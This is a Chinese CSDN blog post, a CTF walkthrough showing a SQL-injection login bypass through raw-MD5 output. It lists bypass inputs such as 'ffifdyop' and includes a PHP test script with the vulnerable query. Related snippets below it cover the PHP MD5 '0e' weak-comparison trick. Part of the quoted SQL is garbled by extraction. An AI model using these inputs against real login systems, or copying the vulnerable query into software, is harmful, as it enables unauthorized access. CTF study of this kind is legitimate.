ctf md5构造 字符串转化

最新推荐文章于 2024-06-25 22:58:14 发布
最新推荐文章于 2024-06-25 22:58:14 发布
阅读量972 收藏
点赞数 2
文章标签: ctf md5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43943098/article/details/95612215
版权

ctf题目:

http://www.shiyanbar.com/ctf/2036

解题过程

在这里插入图片描述
做web题一般从界面上是看不出什么东西的,所以直接按F12打开控制台查看源代码

在这里插入图片描述
看到这么一大段注释我就知道有鬼,开始仔细阅读。
看到这一句就已经很明显了,是sql注入的问题
s q l = " S E L E C T ∗ F R O M a d m i n W H E R E u s e r n a m e = ′ a d m i n ′ a n d p a s s w o r d = ′ " . m d 5 ( sql = "SELECT * FROM admin WHERE username = 'admin' and password ='".md5( sql="SELECTFROMadminWHEREusername=adminandpassword=".md5(password,true)."’";
但是password="’.md5($password,ture).’"
显然我们输入的password会被md5加密,并且会再次转化为字符串型。
那么就是需要构造一个最终结构是sql命令的明文了

来自度娘的几个明文结构

1: .md5(4611686052576742364).
2: .md5(e58).
3: .md5().
4: .md5(ffifdyop).
5: .md5(129581926211651571912466741651878684928).
测试代码

<?php 
    
error_reporting(0);

$link = mysql_connect('localhost', 'root', '');
if (!$link) { 
    die('Could not connect to MySQL: ' . mysql_error()); 
} 

// 选择数据库
$db = mysql_select_db("test", $link);
if(!$db)
{
    echo 'select db error';
    exit();
}

// 执行sql
$password = "ffifdyop";
$sql = "SELECT * FROM admin WHERE pass = '".md5($password,true)."'";
var_dump($sql);
$result=mysql_query($sql) or die('<pre>' . mysql_error() . '</pre>' );

$row1 = mysql_fetch_row($result);
var_dump($row1);

mysql_close($link);

?>

转载于https://joychou.org/web/SQL-injection-with-raw-MD5-hashes.html
感谢dalao分享

最后把上面给的明文结构输入便可以得到flag:
在这里插入图片描述
解题结束

猫耳灵喵
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
16进制转字符串_攻防世界hello,CTF_逆向之旅006
weixin_43281394的博客
12-26 618
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 攻防世界hello,CTF_逆向之旅006前言一、使用exeinfope分析二、使用ida分析总结 前言 题目链接:https://adworld.xctf.org.cn/task/answer?type=reverse&number=4&grade=0&id=5075&page=1 一、使用exeinfope分析 得到的信息: 1.是32位的可执行文件; 2.没有壳 所以运行这个程序: 输错了,就会报
CTF之进制转换(CTF一)
kangzinian的博客
06-04 2560
最近做网络安全课设,需要打CTF靶场,到了最后写报告的环节,需要写出四个的详细信息,在这里做一个备份。 摘要:把大字符串分割成小字符串,小字符串统统变成16进制的字符串,最后进行一个ascii码转换得到flag. 首先下载该文件得到了一串字符串: d87 x65 x6c x63 o157 d109 o145 b100000 d116 b1101111 o40 x6b b1100101 b1101100 o141 d105 x62 d101 b1101001 d46 o40 d71 x69 d118 x6
CTF逆向中的字符与数字
re1wn
04-05 1889
CTF逆向中的字符与数字,如若有错,请师傅们多多指导。
CTF_Web:php弱类型绕过与md5碰撞
最新发布
weixin_50372036的博客
06-25 988
md5碰撞只是一种掌握php弱类型的方式,弱类型的内容有很多,数组、字符串比较等等,但不论以哪种方式考,涉及的知识点都是相通的,希望通过对基础知识的分享与大家一同学习进步。“MD5,即消息摘要算法(英语:MD5 Message-Digest Algorithm)。是一种被广泛使用的密码散列函数,将数据(如一段文字)运算变为另一固定长度值,是散列算法的基础原理,可以产生出一个128位(16字节)的散列值(hash value),用于确保信息传输完整一致。
CTFMD5相等值不相等
weixin_34080903的博客
07-28 1430
一开始以为是要寻找MD5碰撞的例子,后来想了想不应该这么复杂,就发现了PHP有个隐式转换的缺陷,PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。构造例子QNKCDZO240610708当然,安全的比较方法是三个=,也就是“===”。...
【LinkCTF-29】Crypto--密码本
VZZmieshenquan的博客
03-02 2014
Description: 密码本(提交你找到的字符串md5值) 这个密码本本该只使用一次的,但是却使用了多次,导致密文易被破解 经过一番尝试发现,秘钥的首字母很可能是y,剩下的就靠你了 cip1: rlojsfklecby cip2: ulakqfgfsjlu cip3: dpaxwxtjgtay Solution: 先写py脚本 看到thos猜测是those,经过测试key变为了ye...
md5碰撞(取字符串中某几位是某几个字符的md5
12-28
碰撞出你指定位置是指定字符的md5
CTF-字符串编码识别工具,网络安全CTF比赛的好帮手!
06-10
在网络安全领域,特别是参与Capture The Flag (CTF)竞赛时,了解和掌握各种字符串编码识别工具至关重要。CTF比赛通常包含多种类型的问题,其中MISC(Miscellaneous)题型涉及广泛,包括密码学、逆向工程、取证分析等...
md5.zip_ctfmd5题_md5 ctf_md5 ctf_md5解密 ctf_解密
09-20
Python的内置库`hashlib`提供了计算MD5哈希的功能,可以使用`hashlib.md5()`函数对字符串进行哈希运算。 "code.txt"可能是提供了一些解密提示或者MD5值的列表,这些MD5值可能与CTF挑战中的谜题有关。参赛者可能需要...
md5碰撞爆破python3脚本
01-16
md5碰撞爆破python3脚本
CTF Converter 编码转换
12-08
5. 文件编码处理:不仅限于字符串,也可能处理整个文件的编码转换。 掌握这些编码转换技能和工具对于提升CTF比赛中的解题能力极其重要。通过实践和学习,参赛者可以更有效地应对各种编码难题,快速解锁隐藏的信息,...
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
12-20
一个很可爱的登录界面: 进行一下目录扫描,发现源码泄露www.zip,把源码给出: ... <?... if($_SESSION['username']) { ... if($_POST['username'] && $_POST['password']) { ... if(strlen($username
CTF赛题:将txt文件提取转换为图片(二维码)
10-20
提取txt文档中的大量0和1,生成二维码
python通过自定义isnumber函数判断字符串是否为数字的方法
09-22
在Python编程中,有时我们需要检查一个字符串是否可以转换为数字,即它是否包含有效的整数或浮点数格式。为了实现这一功能,我们可以自定义一个名为`isnumber`的函数,该函数会遍历字符串中的每个字符并确认它们是否...
md5bypass.7z
07-14
因此,CTF赛题可能会设计成要求参与者找出如何在不知道原始密码的情况下,生成一个具有相同MD5哈希的字符串,以达到“bypass”目标。 压缩包内的文件名列表提供了进一步的线索: 1. `pass-*`系列文件(如pass-01....
md5以0e开头的列表.txt
12-17
md5以0e开头的列表 网络攻防中ctf密码学中一些题目所需要运用的md5 MD5信息摘要算法(英语:MD5 Message-Digest Algorithm),一种被广泛使用的密码散列函数,可以产生出一个128位(16字节)的散列值(hash value...
MD5算法
m0_37925407的博客
11-18 765
应用: 用于密码管理 当我们需要保存某些密码信息以用于身份确认时,如果直接将密码信息以明码方式保存在数据库中,不使用任何保密措施,系统管理员就很容易能得到原来的密码信息,这些信息一旦泄露, 密码也很容易被破译。为了增加安全性,有必要对数据库中需要保密的信息进行加密,这样,即使有人得到了整个数据库,如果没有解密算法,也不能得到原来的密码信息。MD5算法可以很好地解决这个问题,因为它可以将任意长度的输入串经过计算得到固定长度的输出,而且只有在明文相同的情况下,才能等到相同的密文,并且这个算法是不可逆的,即便
CTF编码转换
jeammy06061026的博客
06-24 1309
Base64编码 Base64是一种基于64个可打印字符来表示二进制数据的表示方法。Base64编码要求把3个8位字节(3乘以8=24)转化为4个6位的字节(4乘以6=24),之后在6位的前面补两个0,形成8位一个字节的形式,Base64的尾部填充用的是“=”号,只是用来补足位数的,以四个字符为一个块,最末尾不足四个字符的用“=”号填满。 escape() JavaScript esca...
【超全总结】CTF常见的MD5绕过漏洞和应对方法
M0nH1N的博客
08-06 5542
$str1 = $_GET['str1'];$str2 = $_GET['str2'];if (md5($str1) == md5($str2)){die('OK'); } php弱类型比较产生的漏洞 想要满足这个判断只需要构造MD5值为0e开头的字符串,这样的话弱类型比较会认为是科学技术法,0的多少次方都是0,因此可以绕过 有一些字符串MD5值为0e开头,这里记录一下 QNKCDZO 240610708 s878926199a s155964671a s2145
ctf md5强碰撞
08-27
CTF中的MD5强碰撞指的是在给定的哈希函数是MD5的情况下,找到两个不同的输入值,使得它们的哈希值相同。这个问题是一个密码学的挑战,需要在有限时间内找到碰撞。目前已经有许多方法可以实现MD5强碰撞,包括暴力破解...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值